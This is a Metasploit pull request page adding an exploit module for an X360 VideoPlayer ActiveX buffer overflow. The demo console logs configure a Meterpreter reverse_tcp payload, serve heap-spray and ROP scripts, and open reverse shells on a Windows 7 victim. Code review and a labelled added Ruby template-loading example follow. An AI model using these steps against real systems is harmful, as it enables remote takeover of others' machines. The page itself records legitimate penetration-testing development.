Add module for EDB-35948, X360 Software actvx buffer overflow #4726

Merged
merged 7 commits into from Feb 17, 2015

Conversation

jvazquez-r7
Contributor

Full bug history here: https://rh0dev.github.io/blog/2015/fun-with-info-leaks/

The exploit is kinda nice because it bypasses ASLR/DEP from a .data buffer overflow. So, it's a nice case study, and it's worth having in the framework, I think!

Verification

  • Install Windows 7 SP1
  • Install IE 10
  • Install the vulnerable software. The version I downloaded from: http://www.x360soft.com/demo/videoplayersetup.exe was vulnerable
  • Allow the vulnerable ActiveX to run with IE. Just load any web page using the control and allow IE to use it.
  • From the framework console, use the module (see demo)
  • Set srvhost, payload and lhost (see demo)
  • exploit, visit the link from the victim, hopefully get sessions!

DEMO

msf > use exploit/windows/browser/x360_video_player_set_text_bof
msf exploit(x360_video_player_set_text_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(x360_video_player_set_text_bof) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(x360_video_player_set_text_bof) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(x360_video_player_set_text_bof) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(x360_video_player_set_text_bof) > [*] Using URL: http://172.16.158.1:8080/m82H3OcyvAWMQ
[*] Server started.
[*] 172.16.158.131   x360_video_player_set_text_bof - Gathering target information.
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending response HTML.
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending main.html...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/js/exploit.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending exploit.js...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/js/sprayer.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending sprayer.js...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/js/informer.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending informer.js...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/js/rop_builder.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending rop_builder.js...
[*] Sending stage (770048 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:49171) at 2015-02-06 14:56:26 -0600
[*] Session ID 1 (172.16.158.1:4444 -> 172.16.158.131:49171) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3180)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3556
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending main.html...
[+] Successfully migrated to process

msf exploit(x360_video_player_set_text_bof) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.131 - Meterpreter session 1 closed.  Reason: User exit

return template, binding()
end

def strip_comments(input)
Contributor Author

Damn it, please give me some minutes. I did it because I was having some problems with JsObfu. I was going to file a bug, but I've discovered I was just using it incorrectly. Please give me some minutes to use JsObfu here :)

thanks!

Contributor Author

nvm, I can't find an easy (or even a hard) way of obfuscating different JS files that reference each other. And I'd like to keep the JS as is, because it's easier to read and reuse in the future than one huge JS file :\ If there is a way to do it with the current JSObfu I'm glad to listen; maybe I'm overlooking it!

Contributor

What are you trying to do? Tracking variables?

Comments should be automatically stripped.

Contributor Author

Already discussed with @wchen-r7, for the record: the thing is that the JS is split into several files. We need to reference classes and their methods from other files.

Contributor

I can't really remember if this is one of those limitations @joevennix and I have discussed before with Jsobfu. Tagging him here so he can take a look, maybe. If so, I probably need to mention this in the wiki documentation.

Contributor

Ohh I see, the obfuscated code is running correctly for you, but the obfuscation screws up your heap spray.

Yeah. jsobfu is not very gentle on memory allocation/consumption. Not sure what you can do here. Probably jsobfu needs some options to specify what types of obfuscation you want to use: that way you can turn off everything but variable renaming and whitespace-stripping.

Contributor Author

@joevennix if I use the JS from this branch but with JSObfu, I get:

SCRIPT5009: 'Exploit' is undefined 
whGOvE, line 9 character 1

From <body onload="e = new Exploit(); e.run();">

If I use https://github.com/jvazquez-r7/metasploit-framework/tree/edb_35948_jsobfu_no_var (taking into account your recommendations), the JS loads okay; unfortunately the heap spray isn't reliable anymore in my tests :( and it can't get a reliable address where an array will live.

Contributor

Now tracked as an issue in jsobfu: rapid7/jsobfu#8

With those features, you'd be able to set obfuscate_strings: false, and rewrite_globals: false.

It looks like we already support passing scope in as a constructor option, so you could have gotten away with persisting the same scope and just passing it into each JSObfu() constructor.

Contributor Author

@joevennix oo you answered again before my last comment haha, yeah, that! not a big deal, just something to work on :)

We have already filed a ticket, #4728, with some enhancements for BES in case you would like to follow! :)

Contributor Author

@joevennix ooo thanks for filing rapid7/jsobfu#8 !!

@jvazquez-r7 jvazquez-r7 changed the title Add module for EDB-35948 Add module for EDB-35948, X360 Software actvx buffer overflow Feb 6, 2015
def rop_builder_template(cli, target_info)
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js')
f = File.new(path, 'rb')
template = strip_comments(f.read)
Contributor

No block based?

Contributor

@wchen-r7 is saying this is safer and maybe more canonical, don't remember for sure:

def informer_template(cli, target_info)
  path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js')
  template = nil
  # and I would recommend this check
  if File.readable?(path)
    # the block form closes the file handle automatically (note: File.new does
    # not take a block, File.open does)
    File.open(path, 'rb') {|f| template = strip_comments(f.read)}
    [template, binding]
  else
    # decide if you want to throw an error here, or return "" instead of nil if you want
    # if you're going to return nil anyways, you can pull the [template, binding] out & put it after the if
    ['', binding]
  end
end

Contributor Author

I can make it block based, of course.

Contributor

@kernelsmith yeah, it ensures resource deallocation.
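As an added example (not code from this PR or from the Metasploit project), here is the block-based loader pattern the thread settles on, written as a stand-alone Ruby script: a readability check, `File.open` with a block so the handle is closed even if `strip_comments` raises, and a `[template, binding]` return shaped like the module's `*_template` helpers. The PR's own `strip_comments` is not shown on the page, so `strip_js_comments` and `load_js_template` below are hypothetical helpers; the stripper walks the source character by character so that `//` inside a string literal such as a URL is not mistaken for a comment, which a naive regex would mangle.

```ruby
# Added example, not the PR's code: block-based JS template loading plus a
# comment stripper that is safe for string literals. Helper names are hypothetical.
require 'tmpdir'

# Remove // line comments and /* */ block comments from JavaScript source while
# copying string literals verbatim (so "http://host/path" keeps its slashes).
# Regex literals are not special-cased; this is enough for ordinary template JS.
def strip_js_comments(src)
  out = +''
  i = 0
  n = src.length
  while i < n
    c = src[i]
    if c == '"' || c == "'"
      # string literal: copy through the matching quote, honouring backslash escapes
      quote = c
      j = i + 1
      while j < n && src[j] != quote
        j += 1 if src[j] == '\\'
        j += 1
      end
      out << src[i..j]
      i = j + 1
    elsif src[i, 2] == '//'
      # line comment: skip to the newline, which is kept so line structure survives
      i = src.index("\n", i) || n
    elsif src[i, 2] == '/*'
      # block comment: skip past the closing */ (or to EOF if unterminated)
      j = src.index('*/', i + 2)
      i = j ? j + 2 : n
    else
      out << c
      i += 1
    end
  end
  out
end

# Load a JS template the way the review suggests: check readability first, use
# File.open's block form so the handle is always closed, and return
# [template, binding] with an empty template when the file cannot be read.
def load_js_template(path)
  template = ''
  if File.readable?(path)
    File.open(path, 'rb') { |f| template = strip_js_comments(f.read) }
  end
  [template, binding]
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample input written to a temporary file for the demo.
  Dir.mktmpdir do |dir|
    path = File.join(dir, 'informer.js')
    File.write(path, "// header comment\nvar u = \"http://example.test/x\"; /* note */\n")
    template, _b = load_js_template(path)
    puts template
  end
end
```

Running the script prints the template with both comments gone and the URL intact; a missing or unreadable file yields an empty template rather than a dangling handle.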

@wchen-r7
Contributor

wchen-r7 commented Feb 6, 2015

Pretty good idea with your external files. I might do that too.

super(update_info(info,
'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow",
'Description' => %q{
This module exploits a based buffer overflow in the VideoPlayer.ocx ActiveX installed
Contributor

You're missing a word here.

@jvazquez-r7
Contributor Author

This PR is waiting for rapid7/jsobfu#9 to add obfuscation. Otherwise, it can be landed without obfuscation and I can open a new PR once rapid7/jsobfu#9 is landed and the new gem published.

@wchen-r7
Contributor

I don't really believe the obfuscation PRs are blockers for this one, so I'm just gonna go ahead and process this.

@wchen-r7
Contributor

msf exploit(x360_video_player_set_text_bof) > [*] Using URL: http://0.0.0.0:8181/Fflx65LF4Hc
[*]  Local IP: http://192.168.1.64:8181/Fflx65LF4Hc
[*] Server started.
[*] 192.168.1.106    x360_video_player_set_text_bof - Gathering target information.
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending response HTML.
[*] 192.168.1.106    x360_video_player_set_text_bof - Request: /Fflx65LF4Hc/NPXESJ/
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending main.html...
[*] 192.168.1.106    x360_video_player_set_text_bof - Request: /Fflx65LF4Hc/NPXESJ/js/exploit.js
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending exploit.js...
[*] 192.168.1.106    x360_video_player_set_text_bof - Request: /Fflx65LF4Hc/NPXESJ/js/sprayer.js
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending sprayer.js...
[*] 192.168.1.106    x360_video_player_set_text_bof - Request: /Fflx65LF4Hc/NPXESJ/js/informer.js
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending informer.js...
[*] 192.168.1.106    x360_video_player_set_text_bof - Request: /Fflx65LF4Hc/NPXESJ/js/rop_builder.js
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending rop_builder.js...
[*] 192.168.1.106    x360_video_player_set_text_bof - Request: /Fflx65LF4Hc/NPXESJ/
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending main.html...
[*] Sending stage (770048 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.106:51293) at 2015-02-17 11:38:25 -0600
[*] Session ID 1 (192.168.1.64:4444 -> 192.168.1.106:51293) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2060)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1692
[*] Sending stage (770048 bytes) to 192.168.1.106
[+] Successfully migrated to process 
[*] Meterpreter session 2 opened (192.168.1.64:4444 -> 192.168.1.106:51306) at 2015-02-17 11:38:33 -0600

@wchen-r7 wchen-r7 merged commit 511f637 into rapid7:master Feb 17, 2015
wchen-r7 added a commit that referenced this pull request Feb 17, 2015